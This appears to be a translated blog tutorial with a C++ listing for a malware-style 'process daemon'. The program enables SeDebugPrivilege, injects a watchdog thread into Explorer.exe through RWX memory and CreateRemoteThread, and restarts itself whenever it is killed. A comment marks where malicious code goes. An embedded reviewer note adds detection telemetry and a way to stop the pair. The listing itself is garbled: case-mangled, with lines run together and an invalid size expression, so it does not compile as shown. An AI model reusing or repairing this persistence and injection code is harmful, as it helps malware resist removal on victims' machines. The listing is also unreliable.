Brief introduction
A so-called process daemon is a process that, in order to protect itself from being terminated, creates a guardian that watches it and restarts it as soon as it is ended. The process-daemon approach is commonly used by malware: it is a simple way to protect a process and is easy to implement in ring 3 (user mode). The daemon thread here is created by remote thread injection; I have introduced the basic method of remote thread injection before, which is mainly divided into DLL remote injection and non-DLL remote injection.
Code implementation
/* Reviewer note: this listing is a case-mangled, line-collapsed paste (identifier casing
   is lost, several source lines are joined, the original "//" comment markers on the
   function headers are gone, and "1024x768 * 4" is not valid C++ -- presumably an
   extraction artifact). It does not compile as shown and is preserved unchanged, for
   reading only.
   What the visible calls show: WinMain starts a local watchdog thread (watchfuncdata)
   that injects the body of threadproc into Explorer.exe via
   OpenProcess(PROCESS_ALL_ACCESS) -> VirtualAllocEx(PAGE_EXECUTE_READWRITE) ->
   WriteProcessMemory -> CreateRemoteThread. The injected thread waits on this process's
   PID and relaunches its executable with WinExec when it exits; the local thread in turn
   relaunches Explorer.exe (hidden) and re-injects if the remote thread stops. SeDebugPrivilege
   is enabled first through AdjustTokenPrivileges, and "#pragma warning(disable:4996)"
   silences MSVC's deprecated-CRT-function warnings (strupr etc.).
   Defender-relevant observations: the OpenProcess / VirtualAllocEx / WriteProcessMemory /
   CreateRemoteThread sequence targeting explorer.exe is the canonical injection telemetry
   (e.g. Sysmon Event ID 8 for CreateRemoteThread); the private RWX region left in
   explorer.exe that is not backed by an image file is what memory scanners flag; and the
   SeDebugPrivilege adjustment is an early signal. Because each side only reacts after the
   other has already exited, the pair can be stopped by suspending both the local process
   and the injected thread before terminating them. */
filename:processprotectordemo.cpp// creator:peterzheng//date:2018/9/06 17:32//comment:process protector///////////////////////////////////////////// #pragma once#include <cstdio> #include <iostream> #include <cstdlib># Include <string.h> #include <string> #include <strsafe.h> #include <Windows.h> #include < Tlhelp32.h> #include <vector>using namespace std; #define MAX_LENGTH 255#pragma Warning (disable:4996)// Remote thread parameter structure typedef struct _remotetdparams{lpvoid zwinexec; WinExec Function Address lpvoid zopenprocess; OpenProcess Function Address lpvoid zwaitforsingleobject; WaitForSingleObject Function Address DWORD ZPid; Param = Process ID HANDLE zprocesshandle; Param = Handle CHAR filepath[max_length]; Param = File path}remoteparam;//Local thread parameter struct typedef struCT _localtdparams{CHAR remoteprocname[max_length]; DWORD Localpid; DWORD Remotepid; HANDLE Hremotethread;} localparam;//string Split function bool Splitstring (const string& S, vector<string>& V, const string& c) {String::si Ze_type pos1, Pos2; Pos2 = S.find (c); POS1 = 0; while (string::npos! = Pos2) {v.push_back (S.substr (POS1, pos2-pos1)); POS1 = Pos2 + c.size (); Pos2 = S.find (c, POS1); } if (pos1! 
= s.length ()) V.push_back (S.substr (POS1)); return TRUE;} /* threadproc: runs inside the target process. It resolves OpenProcess / WaitForSingleObject / WinExec only through the addresses handed over in the parameter block, waits forever on the guarded PID, then relaunches filepath. */ Remote thread function body (daemon function) DWORD WINAPI threadproc (Remoteparam *lprp) {typedef UINT (WINAPI *zwinexec) (LPCSTR lpcmdline, UINT Ucmds how); typedef HANDLE (WINAPI *zopenprocess) (DWORD dwdesiredaccess, BOOL bInheritHandle, DWORD dwprocessid); typedef DWORD (WINAPI *zwaitforsingleobject) (HANDLE Hhandle, DWORD dwmilliseconds); Zwinexec ZWE; Zopenprocess ZOP; Zwaitforsingleobject Zwfso; ZWE = (zwinexec) lprp->zwinexec; ZOP = (zopenprocess) lprp->zopenprocess; Zwfso = (zwaitforsingleobject) lprp->zwaitforsingleobject; Lprp->zprocesshandle = ZOP (process_all_access, FALSE, lprp->zpid); Zwfso (Lprp->zprocesshandle, INFINITE); ZWE (Lprp->filepath, sw_show); return 0;} /* getprocessid: Toolhelp32 walk comparing upper-cased image names; returns 0 when no process matches. On a match it returns before CloseHandle, so the snapshot handle leaks on that path. */ Get Piddword __cdecl getprocessid (CHAR *processname) {PROCESSENTRY32 pe32; pe32.dwsize = sizeof (PE32); HANDLE Hprocesssnap = createtoolhelp32snapshot (th32cs_snapprocess, 0); if (Hprocesssnap = = Invalid_handle_value) return 0; BOOL bprocess = Process32First (Hprocesssnap, &pe32); while (bprocess) {if (strcmp (STRUPR (Pe32.szexefile), STRUPR (ProcessName)) = = 0) return Pe32.th32proc EssID; bprocess = Process32Next (Hprocesssnap, &pe32); } closehandle (HPROCESSSNAP); return 0;} /* enabledebugpriv: enables the named privilege on the current process token (injectprocess calls it with SE_DEBUG_NAME). Returns 0 on success and 1 on failure; the token handle is never closed. */ get permission int __cdecl enabledebugpriv (const TCHAR *name) {HANDLE htoken; Token_privileges TP; LUID LUID; if (! OpenProcessToken (GetCurrentProcess (), Token_adjust_privileges | Token_query, &htoken)) return 1; if (! Lookupprivilegevalue (NULL, Name, &luid)) return 1; Tp. Privilegecount = 1; Tp. Privileges[0]. Attributes = se_privilege_enabled; Tp. Privileges[0]. Luid = Luid; if (! 
AdjustTokenPrivileges (htoken, 0, &TP, sizeof (token_privileges), NULL, NULL)) return 1; return 0;} /* injectprocess: the injection step described in the header note. The process handle hWnd is never closed on any path, both remote allocations are PAGE_EXECUTE_READWRITE, and the function reports FALSE on every failure without releasing what it already allocated. */ Thread injection function bool __cdecl injectprocess (const DWORD Dwremotepid, const DWORD dwlocalpid, handle& hthread) {if (enabledeb Ugpriv (Se_debug_name)) return FALSE; HANDLE hWnd = OpenProcess (process_all_access, FALSE, dwremotepid); if (!hwnd) return FALSE; Remoteparam RP; ZeroMemory (&RP, sizeof (Remoteparam)); Rp. Zopenprocess = (LPVOID) GetProcAddress (LoadLibrary ("Kernel32.dll"), "openprocess"); Rp. Zwinexec = (LPVOID) GetProcAddress (LoadLibrary ("Kernel32.dll"), "winexec"); Rp. Zwaitforsingleobject = (LPVOID) GetProcAddress (LoadLibrary ("Kernel32.dll"), "WaitForSingleObject"); Rp. ZPid = Dwlocalpid; CHAR Szpath[max_length] = "n"; GetModuleFileName (NULL, szpath, sizeof (szpath)); StringCchCopy (Rp.filepath, sizeof (Rp.filepath), szpath); Remoteparam *premoteparam = (Remoteparam *) VirtualAllocEx (hWnd, 0, sizeof (remoteparam), Mem_commit | Mem_reserve, Page_execute_readwrite); if (!premoteparam) return FALSE; if (! WriteProcessMemory (HWnd, Premoteparam, &RP, sizeof (Remoteparam), 0)) return FALSE; LPVOID Premotethread = VirtualAllocEx (hWnd, 0, 1024x768 * 4, Mem_commit | Mem_reserve, Page_execute_readwrite); if (!premotethread) return FALSE; if (! 
WriteProcessMemory (HWnd, Premotethread, &threadproc, 1024x768 * 4, 0)) return FALSE; Hthread = CreateRemoteThread (hWnd, NULL, 0, (Lpthread_start_routine) Premotethread, (LPVOID) premoteparam, 0, NULL); if (!hthread) return FALSE; return TRUE;} /* watchfuncdata: the local watchdog loop. Once per second it reads the remote thread's exit code; when it is no longer STILL_ACTIVE it relaunches the target process hidden (SW_HIDE), looks its PID up again and re-injects. The return values of injectprocess and GetExitCodeThread are ignored. */ Remote thread monitoring function (local thread function) DWORD WINAPI watchfuncdata (lpvoid lprarm) {HANDLE Hremotethread = ((localparam*) lprarm) Hremotethread; DWORD dwlocalpid = ((localparam*) lprarm)->localpid; DWORD dwremotepid = ((localparam*) lprarm)->remotepid; CHAR SzremotepRocname[max_length] = "n"; StringCchCopy (szremoteprocname, sizeof (Szremoteprocname), ((localparam*) lprarm)->remoteprocname); DWORD exitCode = 0; while (TRUE) {if (!hremotethread) injectprocess (Dwremotepid, Dwlocalpid, Hremotethread); GetExitCodeThread (Hremotethread, &exitcode); if (exitcode^still_active) {winexec (szremoteprocname, sw_hide); Dwremotepid = GetProcessID (szremoteprocname); Injectprocess (Dwremotepid, Dwlocalpid, Hremotethread); } Sleep (1000); } return 0;} /* WinMain: hard-codes "Explorer.exe" as the host process, derives the local image name from its own module path (split on backslashes), starts the watchdog thread and then loops on a MessageBox; the WaitForSingleObject after the loop is unreachable. */ Main function int WINAPI WinMain (_in_ hinstance hinstance, _in_opt_ hinstance hprevinstance, _in_ LPSTR lpcmdline, _in_ int nshowcm d) {Localparam LPLP; ZeroMemory (&LPLP, sizeof (Localparam)); CHAR Szremoteprocname[max_length] = "n"; CHAR Szlocalprocname[max_length] = "n"; CHAR Currentfilepath[max_length] = "n"; Vector<string> Pathgroup; GetModuleFileName (NULL, currentFilePath, sizeof (currentFilePath)); Splitstring (currentFilePath, pathgroup, "\ \"); StringCchCopy (szlocalprocname, sizeof (Szlocalprocname), Pathgroup[pathgroup.size ()-1].c_str ()); StringCchCopy (szremoteprocname, sizeof (Szremoteprocname), "Explorer.exe"); StringCchCopy (szlocalprocname, sizeof (szlocalprocname), szlocalprocname); StringCchCopy (lplp.remoteprocname, sizeof (lplp.remoteprocname), szremoteprocname); DWORD dwremotepid = GetProcessID (szremoteprocname); DWORD dwlocalpid = GetProcessID (szlocalprocname); HANDLE hthread = NULL; Lplp.remotepid = Dwremotepid; Lplp.localpid = Dwlocalpid; 
Hthread = CreateThread (NULL, 0, Watchfuncdata, LPVOID (&LPLP), 0, 0); //.... Insert malicious code such as workflow while (TRUE) {MessageBox (NULL, "hello!!", "haha!! XDD ", MB_OK); } WaitForSingleObject (Hthread, INFINITE); return 0;}
Secure Path — C++ implementation of a process daemon